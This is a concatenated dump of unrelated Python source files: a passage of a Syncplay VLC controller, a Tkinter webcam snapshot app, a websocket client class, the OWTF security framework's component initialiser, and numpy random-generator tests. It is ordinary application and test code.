self._previousPosition == self._position and self._duration > constants.PLAYLIST_LOAD_NEXT_FILE_MINIMUM_LENGTH and (self._duration - self._position) < constants.VLC_EOF_DURATION_THRESHOLD and diff > constants.VLC_LATENCY_ERROR_THRESHOLD ): self._client.ui.showDebugMessage("Treating 'playing' response as 'paused' due to VLC EOF bug") self.setPaused(True) self._pausedAsk.set() elif name == "position": newPosition = float(value.replace(",", ".")) if (value != "no-input" and not self._filechanged) else self._client.getGlobalPosition() if newPosition == self._previousPosition and newPosition != self._duration and self._paused is False: self._client.ui.showDebugMessage( "Not considering position {} duplicate as new time because of VLC time precision bug".format( newPosition)) self._previousPreviousPosition = self._previousPosition self._previousPosition = self._position self._positionAsk.set() return self._previousPreviousPosition = self._previousPosition self._previousPosition = self._position self._position = newPosition if self._position < 0 and self._duration > 2147 and self._vlcVersion == "3.0.0": self.drop(getMessage("vlc-failed-versioncheck")) self._lastVLCPositionUpdate = time.time() self._positionAsk.set() elif name == "filename": self._filechanged = True self._filename = value self._filenameAsk.set() elif line.startswith("vlc-version: "): self._vlcVersion = line.split(': ')[1].replace(' ', '-').split('-')[0] if not utils.meetsMinVersion(self._vlcVersion, constants.VLC_MIN_VERSION): self._client.ui.showErrorMessage(getMessage("vlc-version-mismatch").format(constants.VLC_MIN_VERSION)) self._vlcready.set() @staticmethod def run(client, playerPath, filePath, args): vlc = VlcPlayer(client, VlcPlayer.getExpandedPath(playerPath), filePath, args) return vlc @staticmethod def getDefaultPlayerPathsList(): l = [] for path in constants.VLC_PATHS: p = VlcPlayer.getExpandedPath(path) if p: l.append(p) return l @staticmethod def isValidPlayerPath(path): if "vlc" in path.lower() and VlcPlayer.getExpandedPath(path): return True return False @staticmethod def getPlayerPathErrors(playerPath, filePath): return None @staticmethod def getIconPath(path): return constants.VLC_ICONPATH @staticmethod def getExpandedPath(playerPath): if not os.path.isfile(playerPath): if os.path.isfile(playerPath + "vlc.exe"): playerPath += "vlc.exe" return playerPath elif os.path.isfile(playerPath + "\\vlc.exe"): playerPath += "\\vlc.exe" return playerPath elif os.path.isfile(playerPath + "VLCPortable.exe"): playerPath += "VLCPortable.exe" return playerPath elif os.path.isfile(playerPath + "\\VLCPortable.exe"): playerPath += "\\VLCPortable.exe" return playerPath if os.access(playerPath, os.X_OK): return playerPath for path in os.environ['PATH'].split(':'): path = os.path.join(os.path.realpath(path), playerPath) if os.access(path, os.X_OK): return path def drop(self, dropErrorMessage=None): if self._listener: self._vlcclosed.clear() self._listener.sendLine('close-vlc') self._vlcclosed.wait() self._durationAsk.set() self._filenameAsk.set() self._pathAsk.set() self._positionAsk.set() self._vlcready.set() self._pausedAsk.set() if dropErrorMessage: self.reactor.callFromThread(self._client.ui.showErrorMessage, dropErrorMessage, True) self.reactor.callFromThread(self._client.stop, False,) class __Listener(threading.Thread, asynchat.async_chat): def __init__(self, playerController, playerPath, filePath, args, vlcReady, vlcClosed): self.__playerController = playerController self.requestedVLCVersion = False self.vlcHasResponded = False self.oldIntfVersion = None self.timeVLCLaunched = None call = [playerPath] if filePath: if utils.isASCII(filePath): call.append(filePath) else: call.append(self.__playerController.getMRL(filePath)) def _usevlcintf(vlcIntfPath, vlcIntfUserPath): vlcSyncplayInterfacePath = vlcIntfPath + "syncplay.lua" if not os.path.isfile(vlcSyncplayInterfacePath): vlcSyncplayInterfacePath = vlcIntfUserPath + "syncplay.lua" if os.path.isfile(vlcSyncplayInterfacePath): with open(vlcSyncplayInterfacePath, 'rU') as interfacefile: for line in interfacefile: if "local connectorversion" in line: interface_version = line[26:31] if utils.meetsMinVersion(interface_version, constants.VLC_INTERFACE_MIN_VERSION): return True else: self.oldIntfVersion = line[26:31] return False playerController._client.ui.showErrorMessage(getMessage("vlc-interface-not-installed")) return False if isLinux(): playerController.vlcIntfPath = "/usr/lib/vlc/lua/intf/" playerController.vlcIntfUserPath = os.path.join(os.getenv('HOME', '.'), ".local/share/vlc/lua/intf/") elif isMacOS(): playerController.vlcIntfPath = "/Applications/VLC.app/Contents/MacOS/share/lua/intf/" playerController.vlcIntfUserPath = os.path.join( os.getenv('HOME', '.'), "Library/Application Support/org.videolan.vlc/lua/intf/") elif isBSD(): # *BSD ports/pkgs install to /usr/local by default. # This should also work for all the other BSDs, such as OpenBSD or DragonFly. playerController.vlcIntfPath = "/usr/local/lib/vlc/lua/intf/" playerController.vlcIntfUserPath = os.path.join(os.getenv('HOME', '.'), ".local/share/vlc/lua/intf/") else: playerController.vlcIntfPath = os.path.dirname(playerPath).replace("\\", "/") + "/lua/intf/" playerController.vlcIntfUserPath = os.path.join(os.getenv('APPDATA', '.'), "VLC\\lua\\intf\\") playerController.vlcModulePath = playerController.vlcIntfPath + "modules/?.luac" if _usevlcintf(playerController.vlcIntfPath, playerController.vlcIntfUserPath): playerController.SLAVE_ARGS.append( '--lua-config=syncplay={{port=\"{}\"}}'.format(str(playerController.vlcport))) else: if isLinux(): playerController.vlcDataPath = "/usr/lib/syncplay/resources" else: playerController.vlcDataPath = utils.findWorkingDir() + "\\resources" playerController.SLAVE_ARGS.append('--data-path={}'.format(playerController.vlcDataPath)) playerController.SLAVE_ARGS.append( '--lua-config=syncplay={{modulepath=\"{}\",port=\"{}\"}}'.format( playerController.vlcModulePath, str(playerController.vlcport))) call.extend(playerController.SLAVE_ARGS) if args: call.extend(args) self._vlcready = vlcReady self._vlcclosed = vlcClosed self._vlcVersion = None if self.oldIntfVersion: self.__playerController.drop( getMessage("vlc-interface-version-mismatch").format( self.oldIntfVersion, constants.VLC_INTERFACE_MIN_VERSION)) else: if isWindows() and getattr(sys, 'frozen', '') and getattr(sys, '_MEIPASS', '') is not None: # Needed for pyinstaller --onefile bundle self.__process = subprocess.Popen( call, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=False, creationflags=0x08000000) else: self.__process = subprocess.Popen(call, stderr=subprocess.PIPE, stdout=subprocess.PIPE) self.timeVLCLaunched = time.time() if self._shouldListenForSTDOUT(): for line in iter(self.__process.stderr.readline, ''): line = line.decode('utf-8') self.vlcHasResponded = True self.timeVLCLaunched = None if "[syncplay]" in line: if "Listening on host" in line: break if "Hosting Syncplay" in line: break elif "Couldn't find lua interface" in line: playerController._client.ui.showErrorMessage( getMessage("vlc-failed-noscript").format(line), True) break elif "lua interface error" in line: playerController._client.ui.showErrorMessage( getMessage("media-player-error").format(line), True) break if not isMacOS(): self.__process.stderr = None else: vlcoutputthread = threading.Thread(target=self.handle_vlcoutput, args=()) vlcoutputthread.setDaemon(True) vlcoutputthread.start() threading.Thread.__init__(self, name="VLC Listener") asynchat.async_chat.__init__(self) self.set_terminator(b'\n') self._ibuffer = [] self.create_socket(socket.AF_INET, socket.SOCK_STREAM) self._sendingData = threading.Lock() def _shouldListenForSTDOUT(self): return not isWindows() def initiate_send(self): with self._sendingData: asynchat.async_chat.initiate_send(self) def run(self): self._vlcready.clear() self.connect(('localhost', self.__playerController.vlcport)) asyncore.loop() def handle_connect(self): asynchat.async_chat.handle_connect(self) self._vlcready.set() self.timeVLCLaunched = None def collect_incoming_data(self, data): self._ibuffer.append(data) def handle_close(self): if self.timeVLCLaunched and time.time() - self.timeVLCLaunched < constants.VLC_OPEN_MAX_WAIT_TIME: try: self.__playerController._client.ui.showDebugMessage("Failed to connect to VLC, but reconnecting as within max wait time") except: pass self.run() elif self.vlcHasResponded: asynchat.async_chat.handle_close(self) self.__playerController.drop() else: self.vlcHasResponded = True asynchat.async_chat.handle_close(self) self.__playerController.drop(getMessage("vlc-failed-connection").format(constants.VLC_MIN_VERSION)) def handle_vlcoutput(self): out = self.__process.stderr for line in iter(out.readline, ''): line = line.decode('utf-8') if '[syncplay] core interface debug: removing module' in line: self.__playerController.drop() break out.close() def found_terminator(self): self.vlcHasResponded = True self.__playerController.lineReceived(b"".join(self._ibuffer)) self._ibuffer = [] def sendLine(self, line): if self.connected: if not self.requestedVLCVersion: self.requestedVLCVersion = True self.sendLine("get-vlc-version") # try: lineToSend = line + "\n" self.push(lineToSend.encode('utf-8')) if self.__playerController._client and self.__playerController._client.ui: self.__playerController._client.ui.showDebugMessage("player >> {}".format(line)) # except: # pass if line == "close-vlc": self._vlcclosed.set() if not self.connected and not self.timeVLCLaunched: # For circumstances where Syncplay is not connected to VLC and is not reconnecting try: self.__process.terminate() except: # When VLC is already closed pass
app.py
from __future__ import print_function from PIL import Image from PIL import ImageTk import Tkinter as tki import threading import datetime import imutils import cv2 import os class SpikeLive: def __init__(self, vs, outputPath): self.vs = vs self.outputPath = outputPath self.frame = None self.thread = None self.stopEvent = None self.root = tki.Tk() self.panel = None btn = tki.Button(self.root, text = "Snapshot!", command = self.takeSnapshot) btn.pack(side = "bottom", fill = "both", expand = "yes", padx = 10, pady = 10) self.stopEvent = threading.Event() self.thread = threading.Thread(target = self.videoLoop, args = {}) self.thread.start() self.root.wm_title("PyImageSearch Photobooth") self.root.wm_protocol("WM_DELETE_WINDOW", self.onClose) def videoLoop(self): try: while not self.stopEvent.is_set(): self.frame = self.vs.read() self.frame = imutils.resize(self.frame, width = 300) image = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGB) image = Image.fromarray(image) image = ImageTk.PhotoImage(image) if self.panel is None: self.panel = tki.Label(image = image) self.panel.image = image self.panel.pack(side = "left", padx = 10, pady = 10) else: self.panel.configure(image = image) self.panel.image = image except RuntimeError: print('[INFO] caught a RuntimeError') def takeSnapshot(self): ts =datetime.datetime.now() filename = "{}.jpg".format(ts.strftime("%Y-%m-%d_%H-%M-%S")) p = os.path.sep.join((self.outputPath, filename)) cv2.imwrite(p, self.frame.copy()) print('[INFO] saved {}'.format(filename)) def onClose(self): print('[INFO] closing...') self.stopEvent.set() self.vs.stop() self.root.quit()
generic_websocket.py
""" Module used as a interfeace to describe a generick websocket client """ import asyncio import websockets import socket import json import time from threading import Thread from pyee import EventEmitter from ..utils.custom_logger import CustomLogger # websocket exceptions from websockets.exceptions import ConnectionClosed class AuthError(Exception): """ Thrown whenever there is a problem with the authentication packet """ pass def is_json(myjson): try: json_object = json.loads(myjson) except ValueError as e: return False return True class Socket(): def __init__(self, sId): self.ws = None self.isConnected = False self.isAuthenticated = False self.id = sId def set_connected(self): self.isConnected = True def set_disconnected(self): self.isConnected = False def set_authenticated(self): self.isAuthenticated = True def set_unauthenticated(self): self.isAuthenticated = False def set_websocket(self, ws): self.ws = ws def _start_event_worker(): async def event_sleep_process(): """ sleeping process for event emitter to schedule on """ while True: await asyncio.sleep(0) def start_loop(loop): asyncio.set_event_loop(loop) loop.run_until_complete(event_sleep_process()) event_loop = asyncio.new_event_loop() worker = Thread(target=start_loop, args=(event_loop,)) worker.start() ee = EventEmitter(scheduler=asyncio.ensure_future, loop=event_loop) return ee class GenericWebsocket: """ Websocket object used to contain the base functionality of a websocket. Inlcudes an event emitter and a standard websocket client. """ def __init__(self, host, logLevel='INFO', max_retries=5, create_event_emitter=None): self.host = host self.logger = CustomLogger('BfxWebsocket', logLevel=logLevel) # overide 'error' event to stop it raising an exception # self.events.on('error', self.on_error) self.ws = None self.max_retries = max_retries self.attempt_retry = True self.sockets = {} # start seperate process for the even emitter create_ee = create_event_emitter or _start_event_worker self.events = create_ee() def run(self): """ Starte the websocket connection. This functions spawns the initial socket thread and connection. """ self._start_new_socket() def get_task_executable(self): """ Get the run indefinitely asyncio task """ return self._run_socket() def _start_new_socket(self, socketId=None): if not socketId: socketId = len(self.sockets) def start_loop(loop): asyncio.set_event_loop(loop) loop.run_until_complete(self._run_socket()) worker_loop = asyncio.new_event_loop() worker = Thread(target=start_loop, args=(worker_loop,)) worker.start() return socketId def _wait_for_socket(self, socket_id): """ Block until the given socket connection is open """ while True: socket = self.sockets.get(socket_id, False) if socket: if socket.isConnected and socket.ws: return time.sleep(0.01) async def _connect(self, socket): async with websockets.connect(self.host) as websocket: self.sockets[socket.id].set_websocket(websocket) self.sockets[socket.id].set_connected() self.logger.info("Websocket connected to {}".format(self.host)) while True: await asyncio.sleep(0) message = await websocket.recv() await self.on_message(socket.id, message) def get_socket(self, socketId): return self.sockets[socketId] def get_authenticated_socket(self): for socketId in self.sockets: if self.sockets[socketId].isAuthenticated: return self.sockets[socketId] return None async def _run_socket(self): retries = 0 sId = len(self.sockets) s = Socket(sId) self.sockets[sId] = s while retries < self.max_retries and self.attempt_retry: try: await self._connect(s) retries = 0 except (ConnectionClosed, socket.error) as e: self.sockets[sId].set_disconnected() if self.sockets[sId].isAuthenticated: self.sockets[sId].set_unauthenticated() self._emit('disconnected') if (not self.attempt_retry): return self.logger.error(str(e)) retries += 1 # wait 5 seconds befor retrying self.logger.info("Waiting 5 seconds before retrying...") await asyncio.sleep(5) self.logger.info("Reconnect attempt {}/{}".format(retries, self.max_retries)) self.logger.info("Unable to connect to websocket.") self._emit('stopped') def remove_all_listeners(self, event): """ Remove all listeners from event emitter """ self.events.remove_all_listeners(event) def on(self, event, func=None): """ Add a new event to the event emitter """ if not func: return self.events.on(event) self.events.on(event, func) def once(self, event, func=None): """ Add a new event to only fire once to the event emitter """ if not func: return self.events.once(event) self.events.once(event, func) def _emit(self, event, *args, **kwargs): self.events.emit(event, *args, **kwargs) async def on_error(self, error): """ On websocket error print and fire event """ self.logger.error(error) async def on_close(self): """ On websocket close print and fire event. This is used by the data server. """ self.logger.info("Websocket closed.") self.attempt_retry = False for key, socket in self.sockets.items(): await socket.ws.close() self._emit('done') async def on_open(self): """ On websocket open """ pass async def on_message(self, message): """ On websocket message """ pass
component_initialiser.py
import logging import multiprocessing from datetime import time from framework.config.config import Config from framework.db.command_register import CommandRegister from framework.db.config_manager import ConfigDB from framework.db.db import DB from framework.db.error_manager import ErrorDB from framework.db.mapping_manager import MappingDB from framework.db.plugin_manager import PluginDB from framework.db.poutput_manager import POutputDB from framework.db.resource_manager import ResourceDB from framework.db.session_manager import OWTFSessionDB from framework.db.target_manager import TargetDB from framework.db.transaction_manager import TransactionManager from framework.db.url_manager import URLManager from framework.db.worklist_manager import WorklistManager from framework.dependency_management.dependency_resolver import ServiceLocator from framework.error_handler import ErrorHandler from framework.http.proxy.outbound_proxyminer import Proxy_Miner from framework.http.proxy.proxy_manager import Proxy_manager, Proxy_Checker from framework.http.requester import Requester from framework.interface.reporter import Reporter from framework.lib.general import cprint from framework.plugin.plugin_handler import PluginHandler from framework.plugin.plugin_helper import PluginHelper from framework.plugin.plugin_params import PluginParams from framework.protocols.smtp import SMTP from framework.protocols.smb import SMB from framework.selenium.selenium_handler import Selenium from framework.shell.blocking_shell import Shell from framework.shell.interactive_shell import InteractiveShell from framework.timer import Timer from framework.wrappers.set.set_handler import SETHandler from framework.zap import ZAP_API from framework.zest import Zest class ComponentInitialiser(): """ Initialises all the components for the OWTF framework. The order is important as there are dependencies between modules. Cyclic dependencies are solved using a two-step initialization process through an init() method. """ @staticmethod def initialisation_phase_1(root_dir, owtf_pid): """First phase of the initialization. :param str root_dir: Absolute path to the OWTF root. :param int owtf_pid: PID for the OWTF process. """ Config(root_dir, owtf_pid) ErrorHandler() DB() try: OWTFSessionDB() except: raise DatabaseNotRunningException() WorklistManager() ConfigDB() CommandRegister() TargetDB() ResourceDB() ErrorDB() MappingDB() PluginDB() Zest() URLManager() TransactionManager() @staticmethod def initialisation_phase_2(args): """ Second phase of the initialization process. :param dict args: parsed arguments from the command line. """ db_config = ServiceLocator.get_component("db_config") db_config.init() Timer(db_config.Get('DATE_TIME_FORMAT')) ServiceLocator.get_component("db_plugin").init() ServiceLocator.get_component("config").init() ServiceLocator.get_component("zest").init() PluginHandler(args) Reporter() POutputDB() ServiceLocator.get_component("command_register").init() ServiceLocator.get_component("worklist_manager").init() Shell() PluginParams(args) SMB() InteractiveShell() Selenium() SMTP() SETHandler() ZAP_API() @staticmethod def initialisation_phase_3(options): """ Third phase of the initialization process. :param list proxy: Proxy configuration parameters :param dict options: Options from command line. """ ServiceLocator.get_component("resource").init() ServiceLocator.get_component("mapping_db").init() ServiceLocator.get_component("db").init() db_config = ServiceLocator.get_component("db_config") ServiceLocator.get_component("error_handler").init() proxy = [db_config.Get('INBOUND_PROXY_IP'), db_config.Get('INBOUND_PROXY_PORT')] Requester(proxy) PluginHelper() ServiceLocator.get_component("plugin_handler").init(options) ServiceLocator.get_component("reporter").init() @staticmethod def intialise_proxy_manager(options): """ Proxy Manager initialization. :param dict options: Proxy manager configuration parameters. """ proxy_manager = None if options['Botnet_mode'] is not None: proxy_manager = Proxy_manager() answer = "Yes" proxies = [] if options['Botnet_mode'][0] == "miner": miner = Proxy_Miner() proxies = miner.start_miner() if options['Botnet_mode'][0] == "list": # load proxies from list proxies = proxy_manager.load_proxy_list(options['Botnet_mode'][1]) answer = raw_input("[#] Do you want to check the proxy list? [Yes/no] : ") if answer.upper() in ["", "YES", "Y"]: proxy_q = multiprocessing.Queue() proxy_checker = multiprocessing.Process(target=Proxy_Checker.check_proxies, args=(proxy_q, proxies,)) logging.info("Checking Proxies...") start_time = time.time() proxy_checker.start() proxies = proxy_q.get() proxy_checker.join() proxy_manager.proxies = proxies proxy_manager.number_of_proxies = len(proxies) if options['Botnet_mode'][0] == "miner": logging.info("Writing proxies to disk(~/.owtf/proxy_miner/proxies.txt)") miner.export_proxies_to_file("proxies.txt", proxies) if answer.upper() in ["", "YES", "Y"]: logging.info("Proxy Check Time: %s" % time.strftime('%H:%M:%S', time.localtime(time.time() - start_time - 3600))) cprint("Done") if proxy_manager.number_of_proxies is 0: ServiceLocator.get_component("error_handler").FrameworkAbort("No Alive proxies.") proxy = proxy_manager.get_next_available_proxy() # check proxy var... http:// sock:// options['OutboundProxy'] = [] options['OutboundProxy'].append(proxy["proxy"][0]) options['OutboundProxy'].append(proxy["proxy"][1]) class DatabaseNotRunningException(Exception): pass
test_generator_mt19937.py
import sys import hashlib import pytest import numpy as np from numpy.linalg import LinAlgError from numpy.testing import ( assert_, assert_raises, assert_equal, assert_allclose, assert_warns, assert_no_warnings, assert_array_equal, assert_array_almost_equal, suppress_warnings) from numpy.random import Generator, MT19937, SeedSequence random = Generator(MT19937()) JUMP_TEST_DATA = [ { "seed": 0, "steps": 10, "initial": {"key_sha256": "bb1636883c2707b51c5b7fc26c6927af4430f2e0785a8c7bc886337f919f9edf", "pos": 9}, "jumped": {"key_sha256": "ff682ac12bb140f2d72fba8d3506cf4e46817a0db27aae1683867629031d8d55", "pos": 598}, }, { "seed":384908324, "steps":312, "initial": {"key_sha256": "16b791a1e04886ccbbb4d448d6ff791267dc458ae599475d08d5cced29d11614", "pos": 311}, "jumped": {"key_sha256": "a0110a2cf23b56be0feaed8f787a7fc84bef0cb5623003d75b26bdfa1c18002c", "pos": 276}, }, { "seed": [839438204, 980239840, 859048019, 821], "steps": 511, "initial": {"key_sha256": "d306cf01314d51bd37892d874308200951a35265ede54d200f1e065004c3e9ea", "pos": 510}, "jumped": {"key_sha256": "0e00ab449f01a5195a83b4aee0dfbc2ce8d46466a640b92e33977d2e42f777f8", "pos": 475}, }, ] @pytest.fixture(scope='module', params=[True, False]) def endpoint(request): return request.param class TestSeed: def test_scalar(self): s = Generator(MT19937(0)) assert_equal(s.integers(1000), 479) s = Generator(MT19937(4294967295)) assert_equal(s.integers(1000), 324) def test_array(self): s = Generator(MT19937(range(10))) assert_equal(s.integers(1000), 465) s = Generator(MT19937(np.arange(10))) assert_equal(s.integers(1000), 465) s = Generator(MT19937([0])) assert_equal(s.integers(1000), 479) s = Generator(MT19937([4294967295])) assert_equal(s.integers(1000), 324) def test_seedsequence(self): s = MT19937(SeedSequence(0)) assert_equal(s.random_raw(1), 2058676884) def test_invalid_scalar(self): # seed must be an unsigned 32 bit integer assert_raises(TypeError, MT19937, -0.5) assert_raises(ValueError, MT19937, -1) def test_invalid_array(self): # seed must be an unsigned integer assert_raises(TypeError, MT19937, [-0.5]) assert_raises(ValueError, MT19937, [-1]) assert_raises(ValueError, MT19937, [1, -2, 4294967296]) def test_noninstantized_bitgen(self): assert_raises(ValueError, Generator, MT19937) class TestBinomial: def test_n_zero(self): # Tests the corner case of n == 0 for the binomial distribution. # binomial(0, p) should be zero for any p in [0, 1]. # This test addresses issue #3480. zeros = np.zeros(2, dtype='int') for p in [0, .5, 1]: assert_(random.binomial(0, p) == 0) assert_array_equal(random.binomial(zeros, p), zeros) def test_p_is_nan(self): # Issue #4571. assert_raises(ValueError, random.binomial, 1, np.nan) class TestMultinomial: def test_basic(self): random.multinomial(100, [0.2, 0.8]) def test_zero_probability(self): random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0]) def test_int_negative_interval(self): assert_(-5 <= random.integers(-5, -1) < -1) x = random.integers(-5, -1, 5) assert_(np.all(-5 <= x)) assert_(np.all(x < -1)) def test_size(self): # gh-3173 p = [0.5, 0.5] assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2)) assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2)) assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2)) assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2)) assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2)) assert_equal(random.multinomial(1, p, np.array((2, 2))).shape, (2, 2, 2)) assert_raises(TypeError, random.multinomial, 1, p, float(1)) def test_invalid_prob(self): assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2]) assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9]) def test_invalid_n(self): assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2]) assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2]) def test_p_non_contiguous(self): p = np.arange(15.) p /= np.sum(p[1::3]) pvals = p[1::3] random = Generator(MT19937(1432985819)) non_contig = random.multinomial(100, pvals=pvals) random = Generator(MT19937(1432985819)) contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals)) assert_array_equal(non_contig, contig) def test_multidimensional_pvals(self): assert_raises(ValueError, random.multinomial, 10, [[0, 1]]) assert_raises(ValueError, random.multinomial, 10, [[0], [1]]) assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]]) assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]])) class TestMultivariateHypergeometric: def setup(self): self.seed = 8675309 def test_argument_validation(self): # Error cases... # `colors` must be a 1-d sequence assert_raises(ValueError, random.multivariate_hypergeometric, 10, 4) # Negative nsample assert_raises(ValueError, random.multivariate_hypergeometric, [2, 3, 4], -1) # Negative color assert_raises(ValueError, random.multivariate_hypergeometric, [-1, 2, 3], 2) # nsample exceeds sum(colors) assert_raises(ValueError, random.multivariate_hypergeometric, [2, 3, 4], 10) # nsample exceeds sum(colors) (edge case of empty colors) assert_raises(ValueError, random.multivariate_hypergeometric, [], 1) # Validation errors associated with very large values in colors. assert_raises(ValueError, random.multivariate_hypergeometric, [999999999, 101], 5, 1, 'marginals') int64_info = np.iinfo(np.int64) max_int64 = int64_info.max max_int64_index = max_int64 // int64_info.dtype.itemsize assert_raises(ValueError, random.multivariate_hypergeometric, [max_int64_index - 100, 101], 5, 1, 'count') @pytest.mark.parametrize('method', ['count', 'marginals']) def test_edge_cases(self, method): # Set the seed, but in fact, all the results in this test are # deterministic, so we don't really need this. random = Generator(MT19937(self.seed)) x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method) assert_array_equal(x, [0, 0, 0]) x = random.multivariate_hypergeometric([], 0, method=method) assert_array_equal(x, []) x = random.multivariate_hypergeometric([], 0, size=1, method=method) assert_array_equal(x, np.empty((1, 0), dtype=np.int64)) x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method) assert_array_equal(x, [0, 0, 0]) x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method) assert_array_equal(x, [3, 0, 0]) colors = [1, 1, 0, 1, 1] x = random.multivariate_hypergeometric(colors, sum(colors), method=method) assert_array_equal(x, colors) x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3, method=method) assert_array_equal(x, [[3, 4, 5]]*3) # Cases for nsample: # nsample < 10 # 10 <= nsample < colors.sum()/2 # colors.sum()/2 < nsample < colors.sum() - 10 # colors.sum() - 10 < nsample < colors.sum() @pytest.mark.parametrize('nsample', [8, 25, 45, 55]) @pytest.mark.parametrize('method', ['count', 'marginals']) @pytest.mark.parametrize('size', [5, (2, 3), 150000]) def test_typical_cases(self, nsample, method, size): random = Generator(MT19937(self.seed)) colors = np.array([10, 5, 20, 25]) sample = random.multivariate_hypergeometric(colors, nsample, size, method=method) if isinstance(size, int): expected_shape = (size,) + colors.shape else: expected_shape = size + colors.shape assert_equal(sample.shape, expected_shape) assert_((sample >= 0).all()) assert_((sample <= colors).all()) assert_array_equal(sample.sum(axis=-1), np.full(size, fill_value=nsample, dtype=int)) if isinstance(size, int) and size >= 100000: # This sample is large enough to compare its mean to # the expected values. assert_allclose(sample.mean(axis=0), nsample * colors / colors.sum(), rtol=1e-3, atol=0.005) def test_repeatability1(self): random = Generator(MT19937(self.seed)) sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5, method='count') expected = np.array([[2, 1, 2], [2, 1, 2], [1, 1, 3], [2, 0, 3], [2, 1, 2]]) assert_array_equal(sample, expected) def test_repeatability2(self): random = Generator(MT19937(self.seed)) sample = random.multivariate_hypergeometric([20, 30, 50], 50, size=5, method='marginals') expected = np.array([[ 9, 17, 24], [ 7, 13, 30], [ 9, 15, 26], [ 9, 17, 24], [12, 14, 24]]) assert_array_equal(sample, expected) def test_repeatability3(self): random = Generator(MT19937(self.seed)) sample = random.multivariate_hypergeometric([20, 30, 50], 12, size=5, method='marginals') expected = np.array([[2, 3, 7], [5, 3, 4], [2, 5, 5], [5, 3, 4], [1, 5, 6]]) assert_array_equal(sample, expected) class TestSetState: def setup(self): self.seed = 1234567890 self.rg = Generator(MT19937(self.seed)) self.bit_generator = self.rg.bit_generator self.state = self.bit_generator.state self.legacy_state = (self.state['bit_generator'], self.state['state']['key'], self.state['state']['pos']) def test_gaussian_reset(self): # Make sure the cached every-other-Gaussian is reset. old = self.rg.standard_normal(size=3) self.bit_generator.state = self.state new = self.rg.standard_normal(size=3) assert_(np.all(old == new)) def test_gaussian_reset_in_media_res(self): # When the state is saved with a cached Gaussian, make sure the # cached Gaussian is restored. self.rg.standard_normal() state = self.bit_generator.state old = self.rg.standard_normal(size=3) self.bit_generator.state = state new = self.rg.standard_normal(size=3) assert_(np.all(old == new)) def test_negative_binomial(self): # Ensure that the negative binomial results take floating point # arguments without truncation. self.rg.negative_binomial(0.5, 0.5) class TestIntegers: rfunc = random.integers # valid integer/boolean types itype = [bool, np.int8, np.uint8, np.int16, np.uint16, np.int32, np.uint32, np.int64, np.uint64] def test_unsupported_type(self, endpoint): assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float) def test_bounds_checking(self, endpoint): for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, ubnd, lbnd, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1], endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [ubnd], [lbnd], endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, 1, [0], endpoint=endpoint, dtype=dt) def test_bounds_checking_array(self, endpoint): for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint) assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [lbnd] * 2, [ubnd + 1] * 2, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [1] * 2, 0, endpoint=endpoint, dtype=dt) def test_rng_zero_and_extremes(self, endpoint): for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd is_open = not endpoint tgt = ubnd - 1 assert_equal(self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt), tgt) assert_equal(self.rfunc([tgt], tgt + is_open, size=1000, endpoint=endpoint, dtype=dt), tgt) tgt = lbnd assert_equal(self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt), tgt) assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000, endpoint=endpoint, dtype=dt), tgt) tgt = (lbnd + ubnd) // 2 assert_equal(self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt), tgt) assert_equal(self.rfunc([tgt], [tgt + is_open], size=1000, endpoint=endpoint, dtype=dt), tgt) def test_rng_zero_and_extremes_array(self, endpoint): size = 1000 for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd tgt = ubnd - 1 assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt) 